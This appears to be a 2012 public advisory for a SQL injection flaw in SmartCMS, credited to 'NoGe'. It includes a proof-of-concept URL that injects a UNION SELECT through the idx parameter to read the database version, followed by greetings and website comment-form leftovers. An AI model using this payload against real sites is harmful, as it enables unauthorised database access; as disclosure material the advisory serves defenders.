SmartCMS <= SQL Injection Vulnerability

2012.11.26

Credit: NoGe

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

===========================================
   
  [o] SmartCMS <= SQL Injection Vulnerability
    
       Software : SmartMS
       Vendor   : http://smartcms.nl/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
  
===========================================
  
  [o] Exploit
  
       http://localhost/[path]/index.php?idx=[SQLi]
  
  
  [o] PoC
  
       http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--
  
===========================================
  
  [o] Greetz
  
       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{
  
===========================================
  
  [o] November 26 2012 - Papua, Indonesia

References:

http://smartcms.nl/

http://evilc0de.blogspot.com/

http://cxsecurity.com/issue/WLB-2011080175

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SmartCMS <= SQL Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.